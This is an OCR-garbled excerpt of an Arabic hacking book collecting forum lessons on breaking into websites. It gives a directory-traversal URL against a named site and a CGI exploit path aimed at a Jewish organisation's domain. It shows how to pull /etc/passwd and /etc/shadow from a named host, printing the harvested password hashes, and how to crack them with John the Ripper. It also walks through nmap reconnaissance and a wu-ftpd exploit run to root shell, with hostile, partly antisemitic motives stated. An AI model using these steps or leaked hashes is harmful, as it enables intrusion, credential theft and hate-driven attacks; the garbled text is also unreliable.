ما قلت هذا موقع يهودي وال بدمره وصلح عليهم عنتر ولد بو شداد ، أرسلت رساله لنقطه الضعف ، صلحت لها نسخ ولصق ، ورد علي بالشكر وقائمه بالغاني الجديده لديهم وأخذ فكره حسنه عن المسلمين

وعن العرب بدل من فكره الرهاب اللي حكوماتهم تزرعها في عقولهم

هذا موقع يستحق التدمير ، وقد تم ذلك ، وهو الن تم إرجاعه ولكنtimduff.comلنأخذ مثال : الموقع من جديد ول يحوي ال القليل من الصفحات ل تتجاوز إثنتان

سمعت عن هذا الموقع في أحد منتديات الهاكرز النجليزيه بأنه يقدم خدمه ل أعلم ما هي بالضبط ، فذهبت للموقع لسجل واعرف ماهي ، كان التسجيل عن طريق إرسال معلومات الى بريد اللكتروني ارسلت

معلومات ، وصلني الرد بعد ساعتين تقريبا ، كا كنت أن الرد يكون كله حش وسب ، ما كنت أقراء ال كلم ، ولكن لماذا كل هذاi'm from saudi arabiaكله حش وسب ، ليش ، تبين لي السبب هو ذكري كلمة

الحقد ، ومضت ايام وكل يوم والثاني أحقد عليه أكثر وأكثر عشان عنصريته ، ال أن توفقنا ولقينا لملقم الويب حقه نقطه ضعف في موقعي روسي ، وال الن غير مرقوعه ، تقدر تعرض كل الملفات الموجوده في

السيرفر ، وتقدر تسحب منها كل ماتريد ، عن طريق اليو آر إل هذا

عنوان الموقع وثم /../../../../../../../../../../../../../../../../../ أو حتى من الممكن أن تضع بعد عنوانالموقع /../ فقط ، هل عرفت ما تعرض لك هذه الخيره !

الن سوف أضع النقاط الساسيه لكشف نقاط ضعف على موقع ما :-

- التعرف على كافه الخدمات الموجوده على السيرفر 1 - معرفه نظام التشغيل وإصدارته وكذلك ملقم الويب وأي برمجيات أخرى مثل مفسر نصوص بيرل إذا كان2

ذلك ممكن ، أو برنامج للبيع والشراء .....الخ ) الموجوده في الموقع ، هذا إذا وجد شئ منها Perl - Cgi- عمل جلسه للتقاط كل السكربتات ( 3 %100- ولتنسى تحط البورتات معها ، لنه أحيانا يكون في البورت نقطه ضعف ، ليس هذا صحيحا 4

نقطه الضعف ليست في البورت بعينه ، في البرنامج اللي مصلح إنصات للبورت (هذا أقرب تعبير لها) - أخيرا يمكنك الستفاده من المعلومات التي حصلت عليها في البحث عن نقاط ضعف (يوجد في آخر هذا5

المستند مواقع من ظمنها مواقع تحتوي على أرشيفات قد تفيدك في الحصول على الثغرات)

- كيف يمكن إستغلل نقاط الضعف المكتشفه ؟ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

أبسط الثغرات والتي يستطيع أي مبتدي أن يستخدمها هي تلك التي تنفذ من خلل المتصفح ، مثل المثال /http://www.timduff.comالسابق ذكره لختراق الموقع

نوع آخر ، يكون الستثمار (من الن سوف نطلق إسم إستثمار على الطريقه التي تستغل بها الثغره) يكون في ليونكس ، وهو ما يسمى بالعربي برنامج الغلفshالستثمار على شكل شفره (كود) مكتوب ببرنامج

وتعمل تحت بيئه ليونكس ، وهذا النوعsh وتكون هذه الشفره تحت ملف بالمتداد *.shellوبالنجليزي shellمن الستثمارات هو المفضل ويحسس المخترق بالقوه ونظرا لتعدد الداوت في ليونكس فإن لغه

) batاصبحت قويه فهي تقابل كتابه ملف دفعاتي في ويندوز (

197

Page 198: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

المشهوره ، وهذا النوع غالبا ما تحدثCويوجد نوع من الستثمارات ثاني وهو شفره (كود) مكتوب بلغه فيه أخطأ أثناء عمليه الترجمه ، قد تواجه كثير من المتاعب لذلك يجب أن تكون لديك خلفيه في لغه سي ،

gccولترجمه هذا النوع عليك بالذهاب الى ليونكس وترجمته بإستخدام المترجم gcc Exploit.c -o Exploit

كبتل فسوف يترجمc ، لو كان حرف C وليس *.cملحظه مهمه ( يجب أن يكون المتداد للمف *. ) التي يتطلبها الستثمار قبلhالستثمار وكأنه كتب في سي ++ ، الشئ الثاني تأكد من توفر المكتبات (*.

تشغيله) عليك زياره موقعي فهناك مستندات في البرمجه قد تنفعك

ومن الممكنPerlيوجد نوع ظهر مؤخرا من الستثمارات وبداء ينتشر وهو أيضا شفره ولكن مكتوبه بلغه أن يتم تشغيل هذا النوع من موجه الدوس في ويندوز (يجب أن تملك برنامج يفسر شفرات البيرل مثل أكتيف

بيرل)

وأحيرا انواع نادره من الستثمارات قد تكون على شكل خطوات ....

Exploit إستثمار =

؟ password file- ماهو ملف كلمة المرور ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ملف كلمة المرور معروف من إسمه ، هو الذي في داخله توجد حسابات الشخاص المرخص لهم بالدخولالى السيرفر ، مثل هذا

------------------------------------------------------------------------------------------------root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:

sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp

Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network

Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/:

nobody4:x:65534:65534:SunOS 4.x Nobody:/: www:x:102:1001::/web:/bin/csh

mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu sid:x:103:10::/export/home/sid:/bin/ksh

mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh

198

Page 199: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

landmark:x:1000:1000::/web/landmark:/bin/ksh ------------------------------------------------------------------------------------------------

وقد تكون أكثر بكثير ، حيث أن هذا الملف الموضح بالعلى أختصر بشكل كبير ، فعند سحبه كان يحتوي على أسطر وهي10آللف السطور ، ليس كل ملفات كلمات المرور بهذا الحجم فيوجد منها من ل يتجاوز

الموجوده بكثره ، على العموم أنت الحين عليك تعرف بأن ملف كلمة المرور هو الذي في داخله توجدحسابات الشخاص المرخص لهم بالدخول الى السيرفر ......

- بماذا يفيدني هذا الملف ؟ ~~~~~~~~~~~~~~~~~~~~~~~~~~

يفيدك يا الحبيب في معرفه كلمات السر وإسماء المستخدمين لكي تقوم بإختراق الموقع ، ولكن لتفرح ...! كلمة المرور تكون مشفره ، ل هذا ليس صحيحا تماما ، كانت مشفره زمان ولكن في الوقت الحالي هي

مضلله

Shadowed = كلمة سر مضلله x*او

EpGw4GekZ1B9U كلمة سر مشفره على مقياس = DESهذا النوع من التشفير المستخدم في ، حرف ورقم كبتل13 وعدد من النظمه الخرى ضعيف ، وهو دائما مكون من FreeBSDليونكس و

وسمول ول يحتوي من بينها على رمز ابدا ، بإستثناء ويندوز فهو يستخدم نوع آخر من التشفير وهو نوعضعيف أيضا

؟ password file- كيف يمكن معرفة كلمة السر من خلل ملف الباسورد ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~~~~~~~~~~ في القسم اليمن من لوحه المفاتيح لتقراء من اليسار الى اليمين ، ثم إذهب الىCtrl + Shiftإضغط

... hwwilson.comالعلى حيث وضعت مثال لملف كلمة مرور تم سحبه من الموقع تفسير هذا السطر :-

root:x:0:1:Super-User:/:/sbin/sh

root rootهذا السطر يوضخ المستخدم واللي هو الجذر

199

Page 200: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

x ، ل تفكر في كسرها فهذا مستحيل ، لكن عليكxوكلمة المرور ، ويتضح انها مضلله ، يعني مكانها العلمة

البحث عن ملف ثاني تم تخزين فيه كلمة المرور ، ستعرف بعد قليل كيف تفعل هذا

0 هذا هو رقم المستخدم

1 رقم المجموعه

Super-User:/:/sbin/sh هذا مش مهم

++++++++++++++++++++++++++++الجزء الثالث

) ؟ shadowed) وإذا كان (مضلل encryption- ماالفرق بين إذا كان الملف (مشفر ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~~~~~~~~~~~~~~~~~~~~ أو # أو ! وهذا مثال لها x يكون مكان كلمة المرور رمز مثل * أو shadow fileالملف المضلل

root:x:0:1:Super-User:/:/sbin/sh

لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل هذه root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh

Q71KBZlvYSnVwهنا تكون كلمة المرور المشفره هي

الن طلعت الصوره صافيه ....

- وماذا لو كان ملف كلمة المرور مشفر ، كيف يتم كسره ؟ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~ jack the ripper ويوجد آخر بإسم john the ripper و Crack 5.0aالبرامج كثيره وأشهرها هو

john the ، وأفضل Crack 5a، إذا كنت ممن يجيدون العمل في ليونكس فهذا جيد ، عليك تنزيل ripper لمن يريد إستخدام ويندوز ، وللمعولميه فإن john the ripper ..... عمل أيضا تحت ليونكس

طريقه عمل هذه البرامج :- ويقوم بمطابقه الكلمات الموجوده به ، كما هو موضح هنا . wordlistيقدم للبرنامج

200

Page 201: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

\ ------------------------------------------------------------------------------------------------ Q2wrtUo9LPq2R ------>

الكلماتwordlist / أخذ كلمة من الـ 1يتم مقارنه | // <--- {البدايه} كلمة المرور | /---/ المشفره مع | / / \----|0 / | | يتم --------^--------- / 1 / _____________ المختاره حتى | {تشفير}/ 0| /

word list التطابق | Q6LiJ6ct1oUBz| | كلمة مرور مشفره /---/ الكلمة المختاره-> --------// ------------------ |_____________song إذا حدث تطابق فهذا يعني أن \ ------

كلمة المرور التي كانت مشفره قد كسرت ..

| ------------------------------------------------------------------------------- | ملحظه مهمه :- يتمعمل دوره مثل الموضحه في العلى لكسر كلمات المرور المشفره بسرعه

) 700على معالج بسرعه john the ripper تجربه في الثانيه (إختبرنا5000{النهايه} | ------------------------------------------------------------------------------- |

------------------------------------------------------------------------------------------------هذه الرسمه تعبت عليها عشان كذا ل أحد يسرقها

من واجه دوس نكتب المر التالي john the ripperلتشغيل

john -w:wordlist passwd هو ملف القاموس الذي يحتوي على عدد كبير من الكلمات wordlistحيث

هو الملف الذي يحتوي على كلمات المرور المشفره والتي نود معرفتها passwdو

------------------------------------------------------------------------------------------------Microsoft(R) Windows 98

C)Copyright Microsoft Corp 1981-1998 ).

E:\Desktop\junk\john the ripper>john -w asswd passwd.txt

by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996

Loaded 1 password

**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE

<E:\Desktop\junk\john the ripper ------------------------------------------------------------------------------------------------

الموجود في نفس الدايروكتري ، وعليك حذف هذا الملف إذاjohn.potوسوف تحفظ النتيجه في الملف أردت البدء في عمليه كسر جديده ويمكنك تغيير إسمه أو نقله في مكان آخر بدل من حذفه إذا كنت ترى

ذلك ...

أو بالعربي القوه العنيفه ، وهي ل تحتاج لملفbrute forceهناك طريقه اخرى للكسر وهي تسمى بـ wordlistخانات واربع3 ، هي تقوم بتجربه كل الحروف والرقام والرموز مع بعض في خانتان و

فذلك لن يأخذwordlistوخمس ..الخ حتى تصيب كلمة المرور الصحيحه ، وأنا افضل ان تستخدم ملفات معك في ال ثواني فقط لن عمليه التجربه الموضحه في الرسم بالعلى ذكرت بأنه سرعة تجربه الكلمات

brute حينها إذهب الى القوه العنيفه wordlist كلمة في الثانيه ، إذا لم تفلح ملفات 5000يتجاوز force

السابق ذكرها brute force يستخدم طريقه john the ripperالمر التالي يجعل

john -i passwd

201

Page 202: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

هو ملف كلمة المرور المراد كسره ، إذا قمت بتجربه هذه الطريقه إضغط إنتر أثناء عملpasswdحيث البرنامج لترى الى أين توصل ...

- ولو كان ملف كلمة المرور مضلل ، ماذا علي ان أعمل ؟ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~ لحل هذه المشكله !! Unshadowدائما سوف تواجه كلمة مرور مضلله ، لكن هناك طريقه تسمى

shadow fileإذا واجهت ملف مضلل عليك البحث عن ملف ثاني يسمى ملف الشادو (ملف الظل) وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ، اليك الجدول التالي :

Linux : /etc/shadow token * = SunOS : /etc/shadow token * يأخذ أشكال متعدده اشهرها هو =

FreeBSD : /etc/master.passwd or /etc/shadow token والجديد هو * = x IRIX : /etc/shadow token = x

AIX : /etc/security/passwd token ! = ConvexOS : /etc/shadow or /etc/shadpw token * =

token تعني الرمز الذي يوجد في الملف passwdوهذا يفيد في تسهيل المهمه ، يعني لو مثل لقيت ، ، لقدetc/security/passwdعلمه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في /

إستعنت بالجدول السابق ذكره ، مثال على ملف شادو (أكرر ملف شادو هو الملف الذي تخزن فيه كلمةالمرور الصحيحه)

shadowهذا ملف ------------------------------------------------------------------------------------------------

root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445 ::::::adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935::::::

lp:NP:6445 :::::: ------------------------------------------------------------------------------------------------

نلحظ ان كلمات السر موجوده

لنحصل على ملفshadow passwd مع passwd fileالخطوه الخيره وهي دمج ملف الباسورد متكامل ونقدمه الى برامج الكسر السابق ذكرها...

http://wilsonweb2.hwwilson.com/etc/passwdهذا ملف باسورد حصلنا عليه من ------------------------------------------------------------------------------------------------root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:

sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp

Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network

202

Page 203: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/:

www:x:102:1001::/web:/bin/csh mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu

sid:x:103:10::/export/home/sid:/bin/ksh mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh

jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh landmark:x:1000:1000::/web/landmark:/bin/ksh

------------------------------------------------------------------------------------------------ نعرف من خلل الجدول السابق ذكره بأن كلمة المرور الصحيحه فيx الموضح واللي هو tokenومن الـ etc/shadowالدليل /

إذن نتوجه بالمتصفح الى http://wilsonweb2.hwwilson.com/etc/shadow

لنحصل على الملف ------------------------------------------------------------------------------------------------

root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445:::::: bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: smtp:NP:6445::::::

uucp:NP:6445:::::: nuucp:NP:6445:::::: listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445:::::: nobody4:NP:6445:::::: www:WJctaI.8rcSe2:10507:::::: mirrors:gg9p.5kwGw1MY:10911::::::

sid:stXldZKnujFYo:10515:::::: mirror:iMPWwbrU.gB4k:10601:::::: admin:hDhB5YYKyWgQw:10976:::::: jerome:XDqnOl32tPoGo:10976::::::

erl:0jE9Xem4aJYeI:10982:::::: landmark:0jCgWu6vl8g0s:11185 :::::: ------------------------------------------------------------------------------------------------

في ملف الباسورد ، وهكذا مع جميع الحساباتxنقوم بنسخ كلمات السر الموجوده فيه ولصقها مكان علمه لنحصل على ملف لمة مرور كامل ومتكامل ونقدمه الى برامج الكسر

ملحظه مهمه :- عليك جعل كل حساب في سطر ، يعني تربتها لتتعرف عليها برامج الكسر ...

مواقع تستحق الزياره :-

أرشيف لثغرات www.securiteam.com/exploits/archive.html

أرشيف لثغرات http://www.ussrback.com/

أرشيف ثغرات + الكثير http://www.secureroot.com/

203

Page 204: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

أرشيف ثغرات http://www.rootshell.com/

أرشيف ثغرات http://www.ussrback.com/

مواقع لثغرات www.secureroot.com/category/exploits

دليل لمواقع الهاكينق www.hitboss.com/Hacking

محرك بحث ل غني عنه www.undergroundnews.com/resources/s...ound/search.asp

Warez.com-Undergroundhttp://www.warez.com/

Hacking

)ممتاز لمن يريد البدايه)

http://www.neworder.box.sk/

Security Search Engine http://www.bugs2k.com/

insecure http://www.insecure.org/

/>XMP></BODY></HTML<

http://public.www.easynet.co.uk/cgi...ail/formmail.pl

انتهى،،،

" اختراق المواقع (الجزء الثالث) "

204

Page 205: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

<ةةةةة ةة ةةةة ةةةةةة ةةةةةةةةةة>

اخواني عالم الختراق كبير جدا ...وبسيط جدا جدا لنه من صنع البشر

كوني احد العضاء في هذا المنتدى وجديد في باب الختراق عن طريق الثغرات

وحتى تحصل الفائده للجميع ونتعلم من بعض ..فليس عيبا طلب العلم

انما العيب الجهل والتعالي بالعلم نحن نتعلم ل لنجابه العلماء بل

لننفع امتنا ونرفع رايتها ونقف في وجه من يعاديها .....

في الحقيقه موضوع الثغرات بسيط جدا مثل ما انا قريت عنه بس

يبي متابعه وشوية جهد انا ساطرح بعض السئله لعل الخوان المشرفين

او الكتاب يساعدونا في الموضوع ....

من خلل قرائتي للعديد من تكست الثغرات رغم قدامتها تبين لي عدة امور

) اللي مستضيفه السيرفر حتى تمتلك اليوزر والباسوور وهذا شيء طبيعي host* لن تخترق الموقع (

) اللي هو حق الحسابات للمواقع المستأجره passwd* لن تخترق السيرفر حتى تمتلك ملف الصلحيات (

/ etc/passwdعند السيرفر بس سؤالي اللي محيرني ان الملف واقع تحت مجلد اسمه اي تي سي

فتأتيpasswd ويعني ان كلمة المرور نجمه او اكس او علمة تعجب اما shadowاحيان يكون اسمه فيه

اللي يفك تشفيرها طبعا ملفات الشادو مالك امل للحين john the ripperالكلمه مشفره وتستخدم لها

على حسب علمي مافيه برنامج لها ؟؟؟

فيه سؤال هنا اللي نعرفه ان كل ملف له امتداد بس ليش الملف ذا ماله امتداد ؟

) او (اي صيغه) ؟ pwdواذا حصلت الملف باي طريقه كانت ؟؟ باي صيغه احفظه هل يحفظ كتكست ام (

بعدين فيه سؤال ثاني المجلد اللي فيه الملف من مجلدات اليونكس ؟ لنه كما معروف ان اليونكس

له ست مجلدات

bin خاص بالملفات الثنائيه يعني اللي تشغل النظام etc ملفات ادارة النظام ومن ظمنها الرووت اللي هو حساب مدير النظام او passwd

dev ملفات الجهزه lib مكتبات الربط الديناميكي اللي تساعد النظام في التشغيل tmp الملفات الموقته او غير الثابته usr اسماء المستخدمين وكلمات السر اللي لهم حسابت بالنظام

اقدر انزل الملف منه ؟ وان المجلدات نفسها اللي باليونكس ntهل يعني ذلك لو ان السيرفر فيه نظام

205

Page 206: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

مثل admin.pwd ام تختلف واسم الملف يختلف ntزي اللي موجوده في

* بالنسبه لطريقة الثغرات تعني الطرق للوصول للملفات السابقه او ملفات اخرى

cgi او ملفات من امتداد cgi-binومن اشهرها ثغرات السي جي اي نسبة للمجلد

ماعلينا ليش سموها ؟؟؟

ونريد php.cgiطيب وشلون نتعامل مع الثغره والموقع ببساطه شديده لنفترض ان لدينا ثغره

نفعل التالي /http://www.jewish.orgتطبيقها على موقع ذو دومين نيم يعني مو مستضاف مثل

http://www.jewish.org/ ثم نكتب cgi-bin ثم الثغره /php.cgiبحيث تصبح الخطوات بعد تجميعها

http://www.jewish.org/cgi-bin/php.cgi الكلم هذا كله في المستعرض عندك في حقل

الدرس العنوان

انا نسيت اقول حاجه ماني متأكد منها لعل من يعلق على الموضوع ان كانت غير صحيحه يصححها

وتصبح الثغره السابقه scriptsان ممكن تكون الثغره بمجلد ثاني اسمه

http://www.jewish.org/scripts/php.cgi

scripts خاص بسيرفرات فيها winnt

cgi-bin خاص بسيرفرات يونيكس او ايريس او لينكس

للمعلوميه المجلدات السابقه توضع فيها الملفات التنفيذبه من جهة السيرفر مثل البلت جافا

اما ملفات السكربت جافا تنفذ على جهازك مثل اللي تطلع في المستعرض.

انتهى،،،

" درس في اختراق المواقع (متوسط) "

206

Page 207: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

<ةةةةة> >ICER<ةةةةةة:

الدوات المطلوبه : شيل اكاونت ...اذا بحثت في جوجل سوف تجد الكثير من الشيلزطبعا الناس المحترمه (احمممم) بتركب لينكس او يونيكس و تعيش حياتها و تريح نفسها...في ناس تانيه ماتحبش اللينكس فالشيل اكاونت كويس لها و ممكن يمشي

انا عن نفسي مش حاستعمل التنين :)بس بالنسبه للي حيستعملو الشيل لزم يتاكدو انه بيسمح بالبرامج الساسيه زي

nslookup, host, dig, ping, traceroute,telnet, ssh, ftp عشان تعرف تعمل كومبايل...(يا عم ركب لينكس و ريح نفسك )gcc و اساسي لزم ال و اخر حاجه هي الكسبلويت .nmap and netcatو طبعا الدوات دي

*بعض الملحوظات الهامه :-الشيل اكاونت شبيه جدا بالدوس مع اختلف في الوامر و الوظائف ..مش حناقش كيفيه 1

الحصول على واحد لن فيه مواضيع كثيره اتكلمت عليه. هي عباره عن بورت سكانر متقدمnmap- اداه ال 2 هي اداه شبيه بالتلنت و تقوم برفع بيانات لسيرفير معينNetCat- ال 3-الكسبلويتات هي عباره عن برامج غالبا تكون مكتوبه بلغه السي و هي تقوم 4

باعطائك كافه الصلحيات فهي تخترق جهاز معين و تقوم بعمل كل شيء انت تريدهممكن تلقيها فين؟؟؟

مواقع السيكيوريتي على افه من يشيل...دور و لو مالقيتش قولي و انا اديلك كام موقعتجيب منه الحاجات دي....

*المواقع المرتبطه بالموضوع :a) Linux (http://www.slackware.com(

b) Nmap (http://www.insecure.org(c) NetCat (http://www.l0pht.com/~weld/netcat(/

الخطوات :- )P- ركب الينكس و خش عالنت (مش قلتلك مفيش احسن من اللينكس :1 متبعا التالي :nmap- ركب الداه 2*1 (tar zxvf nmap.tar.gz2 (cd nmap3/. (configure && make && make install

-شوف الموقع المستهدف و ليكن ..3www.target.com

- شوف الي بي تبع الموقع باستخدام 4

nslookup www.target.com

196.1.2.3هذا سوف يعرض لك الي بي للموقع و ليكن - شوف الخدمات اللي بيقدمها الموقع و كمان شوف نظام التشغيل متبعا التالي :-5

"nmap -sS -O 196.1.2.3"

المفروض انه يديك مخرجات شبه الكلم ده :-root@IcEr:~# nmap -sS -O 196.1.2.3

Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap( /Interesting ports on www.target.com (196.1.2.3:(

)The 1531 ports scanned but not shown below are in state: closed(

207

Page 208: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

Port State Service21/tcp open ftp25/tcp open smtp80/tcp open http

111/tcp open sunrpc113/tcp open auth515/tcp open printer963/tcp open unknown

1024/tcp open kdm4444/tcp filtered krb5246000/tcp open X116699/tcp filtered napster

OS guess for host: Linux 2.2.14-2.2.16Uptime 0.160 days (since Mon Apr 30 14:51:06 2001(

Nmap run completed -- 1 IP address (1 host up) scanned in 67 secondsroot@IcEr#~:

تمام كده يا شباب :)نكمل...

FTPالكلم ده كله عباره عن استكشاف للموقع يوريك البورتات المفتوحه..ممكن تشوف لو كان فيه daemon

شغال على الموقع و ل ل في المثال اللي فوق حنلقيه موجود و ده كويس موجوده متبعا التالي :-FTP daemonشوف اي فيرحين من

"telnet 196.1.2.3 21"او"ftp 196.1.2.3"

اي منهم حيديك بانر فيه الفيرجين بتاعه الف تي بي ديمون اللي شغاله على السيرفيرممكن يكون زي كده :

root@IcEr:~# ftp 196.1.2.3Connected to 196.1.2.3.

220 www.target.com FTP server (Version wu-2.6.0(1) Mon Mar 6 13:54:16 SAST 2000(

ready.Name (target:root): anonymous

331 Guest login ok, send your complete e-mail address as password.Password:

230-Welcome, archive user! This is an experimental FTP server. If have any230-unusual problems, please report them via e-mail to

[email protected] you do have problems, please try using a dash (-) as the first

character230-of your password -- this will turn off the continuation messages that

may230-be confusing your ftp client.230-

208

Page 209: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

230 Guest login ok, access restrictions apply.Remote system type is UNIX.

Using binary mode to transfer files.ftp>by

root@IcEr#~:

.wu-2.6.0من الكلم ده تقدر تعرف ان الفيرجين الموجوده هي و كانت اعمليه ناجحه ;)anonymousو ايضا احنا حاولنا نخش كمجهولين

####### صلي على الحبيب المختار #######

مش فاكر المهم انها اهم خطوه :-8 او 7.FTPdاحصل على الكسبلويت بتاعه الفيرجين ديه من

(اللي يعمل سيرش ميتوهش )wuftpd2600.cو لتكن

red hat 6.2المهم لو شفت السورس كود بتاعها حتلقي انها متكوده عشان نظام تشغيل معين و ليكن و يا سلم لو كان الموقع المستهدف بيعمل على نظام التشغيل ده

كده يبقى كل اللي تعمله انك تعمل كومبايل للثغره دي و بشغلها على سيرفر root accessالموقع المستهدف و كده حيديك

(-;root@IcEr:~/# ./wuftpd2600 -t -s 0 196.1.2.3

Target: 196.1.2.3 (ftp/<shellcode>): RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm

Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152loggin into system..

USER ftp331 Guest login ok, send your complete e-mail address as password.

PASS <shellcode<230-Next time please use your e-mail address as your password230 -for example: [email protected] Guest login ok, access restrictions apply.

STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04[

STEP 3 : Checking if we can reach our return address by format stringSTEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now(

STEP 5 : Sending code.. this will take about 10 seconds.Press ^\ to leave shell

Linux lame_box.za.net 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown

uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp(Bang! You have root!

طبعا انا نسيت امر الكومبايل ..شوف المر ده man gcc

و هوه حيديلك معلومات كامله عن امر الكومبايل ..بكل الخيارات اللي معاهكده يبقى انا كده عملت اللي عليه :)

محدش يسالني باه بعد كده و يقولي ياواد يا ايسر اعمل ايهsearch..U will find what U wanna

طيب ...اه نسيت ..محدش سالني اعمل بالنت كات بعد كده ..بعض الثغرات بتحتاجه.. الموجوده ..لكن لو كانت الخاصيهannonymousلو لحظت اننا استغلينا خاصيه ال

209

Page 210: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

دي مش موجوده ..يبقى مش حنعرف نكمل الكلم دهعشان الكسبلويت مش تشتغل ..في هذه الحاله الكسبلويت مش تشتغل ال لو معانا باسورد و يوزر نيم

عشان نخش على الف تي بي بتاع الموقع..عشان كده لزم تقرا السورس بتاع الكسبلويت..و كل اكسبلويت لها ساينتكس و شغل

خاص بيها..بس المبادئ الساسيه و احده.

انتهى،،،

"htaccess" شرح ملف

210

Page 211: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

<ةةةةة> >BSD-r00t<ةةةةةة:

| * مقدمـــة | |htaccess| * اهمية ملف .

|htaccess| * كيفية عمل ملف . خاصة |error| * عمل صفحات

|index| * منع عرض محتويات المجلد الذي ل يوجد به | * منع/اتاحة دخول الموقع لشخاص معينة |

| * تحويل من يحاول فتح لينك للينك اخر |. | htpasswd| * عمل الملف

|htaccess| *الحماية بواسطه . |htaccess| * منع اظهار الملف .

| * اضافة مستخدمين في الملف || * جعل الصفحات تظهر بامتداد اخر |--------------------------------------------------

* مقدمـــة ------------

من اهم وسائل حماية المواقع و اغلق بعض الجزاء فيه بكلمة سر , و منع بعض الناس من دخل الموقع والسماح

و الذي يمكن عمل الكثير و الكثير به .htaccessلغيرهم بالدخول .. هو استخدام الملف .و هذا الملف مخفي و محمي بكلمة سر

htaccess* اهمية ملف .-----------------------

- حماية اي جزء فيه بكملة سر 1 خاصة بك error- عمل صفحات 2index- منع عرض محتويات المجلد الذي ل يوجد به 3- منع/اتاحة دخول الموقع لشخاص معينة4 ..html , .asp- جعل صفحة البداية بأمتدادات غير .5- تحويل من يحاول فتح لينك للينك اخر 6

htaccess* كيفية عمل ملف .---------------------------

" عن طريق عمل للملفNotepadيمكنك عمل هذا الملف بواسطه اي محرر نصوص مثل النوت باد "حفظ باسم و نحفظ اي ان ليس هناك اسم للملف , اذا لم تستطيعtxt على ان يكون ليس امتداده .htaccesالملف بهذا السم .

ذلك" - علمتي التنصيص في اسم الملف - .htaccessاحفظ الملف باسم ".

خاصةerror* عمل صفحات ------------------------

و الفائدة منها هو ان الموقع يظهر بشكل افضل كما انه عند محاولة اي شخص عمل سكان على الموقعسوف يظهر كان

الموقع به كل الثغرات و ذلك لن طريقة عمل السكانر هي انه يقوم بتطبيق كل ثغره على الموقع و يرصدالنتيجه

211

Page 212: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

فاذا كان هناك اي تغير يظهر لك كأن الموقع عليه هذه الثغره . الخاصه ك عن طريق :- errorو يمكنك عمل صفحات ال

اول errorأ- تصميم صفحات ال ب- تحميل الصفحات على الموقع

htaccessج- اضافه السطر التابي في الملف . ErrorDocument error_num

directory_file هو مكانdirectory_file هو رقم الخطا " الرقام موجود بالسفل " و error_numبخيث يكون

التيerrorصفحه ال قمت بتصميمها .

ErrorDocument 404مثال : /errors/nfound.html

و ارقامها : -errorsال

